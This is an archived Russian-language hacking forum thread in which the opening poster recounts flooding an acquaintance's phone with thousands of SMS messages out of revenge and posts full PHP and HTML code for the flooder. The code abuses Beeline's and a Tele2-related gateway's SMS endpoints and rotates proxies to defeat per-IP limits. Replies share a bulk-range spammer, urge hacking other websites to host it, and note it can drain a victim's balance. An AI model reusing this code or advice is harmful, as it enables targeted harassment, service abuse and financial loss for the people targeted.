Просмотр полной версии : Как я зафлудил билайн
Однажды мой знакомый киданул меня на 300$. Я довольно не плохо знал этого человека. Знал его имя, город в котором он живёт и номер его мобильника. Конечно ехать и убивать его за 9 тысячь рублей я не стал =) Но зато решил поглумиться и зафлудить его мобилу смсками. Все наверное знают, что с сайтов операторов можно отправлять смс сообщения - этим я и решил воспользоваться. Через минуту я узнал, что оператор кидалы довольно популярный билайн, который я и сам юзаю =). Потопал я на сайт билайна и нашел там форму отправки смс. И тут облом. Картинка защиты. Обойти методом подмены её не получилось, а о расспознание я и не думал, уж очень навороченая картинка для меня. Тогда я начал тупо ходить по сайту билайна, с каждой секундой всё сильнее признавая своё поражение. Тут я наткнулся на прогу, с помощью, которой как увиряют разработчики можно отсылать смс сообщения прямо с домашнего компьютера. Интересно, надо скачать подумал я. Скачал-поставил. Ага, работает. Ну и?! И тут я вдруг понял, что в этой программе нет никаких картинок защиты, в отличие от формы на сайте. Ну и раз программа отправляет смс сообщения без ввода кодов на картинке защиты значет и я могу. Я проснифил весь исходящий трафик от этой проги netsnifer'ом и увидел обычные http запросы. Через минуту был написан простенкий скрипт для флуда моего недруга. А еще через мгновение его телефон был закидан тысячями сообщений. Такая вот веселая история, не дай Бог никому =).
Ах да, сам код флудера. Чуть не забыл =)
INDEX.HTML :
<html>
<center>
<form name="tele2" action="send.php" method="POST">
<h3>Phone</h3><br>
<input name="phone" value="" type="text" size="14" maxlength="12"><br>
<h3>Count of messages</h3><br>
<input name="count" value="10" type="text" size="14" maxlength="12"><br>
<h3>Message text</h3><br>
<textarea name="message" rows="5" cols="40"></textarea><br>
<input name="submit" type="submit" value="Start spam">
</center>
</html>
<?
ini_set("error_log",'errors.txt');
ini_set("log_errors",'1');
echo '<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">';
set_time_limit(0);
$log=fopen("log.txt","w+");
$proxy="";
$proxycount=0;
$proxyf=file("proxy.txt");
function setproxy(){
global $proxy;
global $proxycount;
global $proxyf;
if (count($proxyf)==0) die;
if ($proxycount==count($proxyf))
{
{$proxy=$proxyf[0];$proxycount=0;exit;}
}
$proxy=trim($proxyf[$proxycount]);
$proxycount=$proxycount+1;
printandlog("Set proxy - ".$proxy);
}
function printandlog($text){
global $log;
fputs($log,$text."\r\n");
echo $text.'<br>';
flush();
}
function send($num,$message){
global $proxy;
//$message=urlencode($message);
$cr=curl_init("http://www.beonline.ru/servlet/send/sms/");
curl_setopt($cr, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
curl_setopt($cr, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($cr, CURLOPT_TIMEOUT, 20);
curl_setopt($cr, CURLOPT_HEADER, 1);
curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");
curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cr, CURLOPT_REFERER, "http://BeeOnLine-Express");
curl_setopt($cr,CURLOPT_PROXY,$proxy);
$r = curl_exec($cr);
if (curl_error($cr))
{
return 'connection_error';
curl_close($cr);
exit;
}
curl_close($cr);
echo $r;
if (StrPos($r,"с данного IP-адреса")<>false) return "notsend";else
return "send";
}
if (!isset($_POST["phone"])) die;
if (!isset($_POST["count"])) die;
if (!isset($_POST["message"])) die;
printandlog("Spam start");
printandlog("Found ".count($proxyf)." proxy");
for ($i=1;$i<=$_POST["count"];$i++)
{
while(1==1)
{
$tem=send(trim($_POST["phone"]),$message);
if ($tem<>"send") setproxy(); else break;
}
printandlog($i." - Send");
}
printandlog("All message send ok");
?>
Кому надо разберётся, что тут да как ;)
-FARAON2005RAMSES-
10.10.2006, 14:11
Чувак, а как насчёт того что там такая хрень - типа всего 12 СМС с одного IP в день!
Ты что и это тоже обошёл? Ты не гонишь? У меня на сайте такая форма есть http://faraon2005ramses.narod.ru/sms.html
Это та же система как на сайте билайна, только без всяких "введите число на картинке"
Что на это скажешь?
Глянул на твою форму :
"Внимание!!! Количество отправляемых сообщений с одного Ip-адреса в сутки ограничено.". В моём примере юзаются прокси и это тоже обходится...
Кто нить поставил себе? Если да то дайде пожалуйста ссылку.
DRON-ANARCHY
16.10.2006, 16:15
ага. чтоб ты запользовал, а чела потом завалили?
тебе дали код-пользуй
====
ps подпись у тебя лажовая
Вот моя ссылка тока че-то это фигня нифига непашет.
у меня 8000 прокси.
Может кто нить скажет почему непашет?
Talisman
24.10.2006, 19:02
на бесплатном ХОЛМовском хостинге (h**) залочены внешние запросы в пшп - вот скрипт и не пашет
Юзай мозги и платный хостинг.... У меня работает (с доработкой небольшой)
Я непойму в каком формате туда вбивать номер для отправки.
Странно я у себя поместил.Но нифига неприсылаеться.
Попробуй просто такую форму заполни:
<center>
<h2>BeeLine SMS Send</h2>
<form action='http://www.beonline.ru/servlet/send/sms/' method='post'>
Phone: <small>(in format 79031234567)</small> <input type='text' maxlength=11 name='phone' /><br />
<input type='hidden' name='number_sms' value='number_sms_send' />
<input type='hidden' name='prf' value='7909' />
<input type='hidden' name='termtype' value='G' />
<textarea name='message' rows=10 cols=55></textarea><br />
<input type='hidden' name='translit' value='' />
<input type='hidden' name='x' value='5' />
<input type='hidden' name='y' value='4' />
<input type='submit' value='Send' />
</form>
</center>
Мне пришло
Да эту форму я знаю.Мне надо чтобы для массофого флуда а не для того чтобы 1 сообщение приходило.
Ну это ясно.
я просто для проверки предложил
Не проверка это ясно, но мне надо для флуда.
Странно у меня нифига неотсылает.
Да пробовал пишет что отправил а сам нече неотправляет.
dinar_007
24.11.2006, 20:02
А инет крэком получится флудить? (:
Я вот сюда залил
http://www.kein2006.jino-net.ru/blank.html
Счас проверять буду :)
Я вот сюда залил
http://www.kein2006.jino-net.ru/blank.html
Счас проверять буду :)
Ну и как? Удачна =)
Нет. Но это видимо потому что хостинг бесплатный....
На нем даже майл бомбер не работает...
Да все прекрасно работает и не надо говрить что у кого то не пашет. А на бесплатном хостинге вообще размещать не надо. Ломаете какои нить сайт заливаете все это добро туда и спамите пока вас не спалят. И проверяите прокси на работоспособность перед тем как в proxy.txt записыват.
Гыг... сайты ломать нехорошо =))).. а спамить тем более
Anti_Woody
02.12.2006, 05:36
А что это за номер такой 7909 ??? ;)
curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");
Вообщем этот скрипт просто напросто отправляет смс на платный номер, указывая свой номер для проверки скрипта вы рискуете остаться без лаве!, но можно и жертву обнулить! :)
А что это за номер такой 7909 ??? ;)
curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");
Вообщем этот скрипт просто напросто отправляет смс на платный номер, указывая свой номер для проверки скрипта вы рискуете остаться без лаве!, но можно и жертву обнулить! :)
:( Ты его хоть устанавливал? запускал?
Anti_Woody
02.12.2006, 06:33
:( Ты его хоть устанавливал? запускал?
Попробовал не глядя, хорошо что php на этом серванте не работал, !
а вот мой знакомый лишился 70р. (удружил так сказать:) )
а вот что мне ответил рамблер: Отсылка с смс странички оператора.
7904*@sms.dti.ru , 7902*@sms.dti.ru ,
7909*@sms.beemail.ru где вместо*** указываем номер абонента идущий после кода.
а у кого нить есть список proxy хороший!напишите плз в приват!=))
Мдя)). Как все сложно. В свое время мы флудили смсами абонентов сотовых прямо с трубы, через моб.тырнет))) сразу по 1000 штук отсылали))
Одно жаль, что мобилу у меня украли, а вап-адрес этого смс-оправителя я, естесстно, по закону бутерброда, не запомнила (((...
Если кто вдруг знает ( и там все до сих пор работает, а было это 2-3 года назад) - киньте линк в личку.
ZanozA, юзай гугл или яндекс.
или скачай Прокси-Свитчер (Proxy Switcher) - а поможет тебе поиск на этом сайте =)
ZanozA, юзай гугл или яндекс.
или скачай Прокси-Свитчер (Proxy Switcher) - а поможет тебе поиск на этом сайте =)
нет еще паблик кряка для этой проги.
версия 3.8.2 пашет только.
У тех кого не работает, а вы https прокси пользуетесь? У меня только с ними все Ок, советую//Отличный скрипт
скиньте кому не жалко список анонимных проксей в личку примного буду благодарен...
а у меня вот что пишет......
Fatal error: Call to undefined function: curl_init() in /home/********/send.php on line 36
insurgent
09.02.2007, 16:02
А как добавить, что в заданное время отправлял смс? Например, в 7:00:00, 7:00:10, 8:10:20 и т д
Darkweider
10.02.2007, 00:16
Даже если этот способ и работает мне кажется багу профиксили... Считаю тему закрытой)
А как добавить, что в заданное время отправлял смс? Например, в 7:00:00, 7:00:10, 8:10:20 и т д
Если есть доступ к крону (cron) в никсах то мона туда добавить запуск скрипта в нужнок время. Или планировщиком задач в винде.
NewHacker
21.04.2007, 11:28
Спасибо автору за скрипт. ОН РАБОТАЕТ.
Но у меня появился вопрос: как отключить перевод в транслит.
zerokill
22.04.2007, 01:06
Автору респект , я тоже хотел зделать что то подобное ,ещё с кликателем .Но есть одна бага в том что чел може отключить услугу принимать смс и ммс с сети (((( . Сам раньше не знал . Ну соответственно изначально она включенна по умолчанию.
АВтору +
Привет усем =)
Судя по количеству просмотров и ответов данная тема многим не безразлична, в связи с этим решил выложить исходники спамилки для оператора теле 2.
index.html
<html>
<center>
<form name="tele2" action="send.php" method="POST">
<h3>Prefix</h3><br>
<input name="prefix" value="7904" type="text"><br>
<h3>From num</h3><br>
<input name="from" value="5110000" type="text" size="14" maxlength="7"><br>
<h3>To num</h3><br>
<input name="to" value="5919999" type="text" size="14" maxlength="7"><br>
<h3>Message text</h3><br>
<textarea name="message" rows="5" cols="40"></textarea><br>
<input name="submit" type="submit" value="Start spam">
</center>
</html>
send.php
<?
ini_set("error_log",'errors.txt');
ini_set("log_errors",'1');
set_time_limit(0);
$log=fopen("log.txt","w+");
$proxy="";
$proxycount=0;
$proxyf=file("proxy.txt");
function setproxy(){
global $proxy;
global $proxycount;
global $proxyf;
if ($proxycount==count($proxyf))
{
{$proxy=$proxyf[0];$proxycount=0;exit;}
}
$proxy=trim($proxyf[$proxycount]);
$proxycount=$proxycount+1;
printandlog("Set proxy - ".$proxy);
}
function printandlog($text){
global $log;
fputs($log,$text."\r\n");
echo $text.'<br>';
flush();
}
function send($prefix,$phone,$message){
global $proxy;
$message=urlencode($message);
$cr=curl_init("http://www.rocc.ru/cgi-bin/sms33.cgi");
curl_setopt($cr, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
curl_setopt($cr, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($cr, CURLOPT_TIMEOUT, 30);
curl_setopt($cr, CURLOPT_HEADER, 1);
curl_setopt($cr, CURLOPT_POSTFIELDS, "Prefix=".$prefix."&phone=".$phone."&message=".$message."&remainchars=160");
curl_setopt($cr,CURLOPT_PROXY,$proxy);
curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($cr);
if (curl_error($cr))
{
return 'connection_error';
curl_close($cr);
exit;
}
curl_close($cr);
// echo $r;
//Сообщение принято к отправке.
if (StrPos($r,"принято к отправке")==true) return "send"; else return "notsend";
}
if (!isset($_POST["from"])) die;
if (!isset($_POST["to"])) die;
if (!isset($_POST["message"])) die;
if (!isset($_POST["prefix"])) die;
printandlog("Spam start");
printandlog("Found ".count($proxyf)." proxy");
for ($i=$from;$i<=$to;$i++)
{
setproxy();
while(1==1)
{
$tem=send($prefix,$i,$message);
if ($tem<>"send") setproxy(); else break;
}
printandlog($i." - Send");
}
printandlog("All message send ok");
?>
Пользуйте ;)
NewHacker
26.04.2007, 09:44
Спасибо. Для полного счастья сделали бы ещё на МТС, Мегафон, Utel
давай еще для украинского Билайна - http://beeline.ua
NewHacker
22.09.2007, 17:51
Нашел как отрубить транслит:
НАДО ИСПРАВИТЬ ЭТО:
"phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");
НА ЭТО:
"phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=1");
http://sms.contact.dn.ua/ юзайте !
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot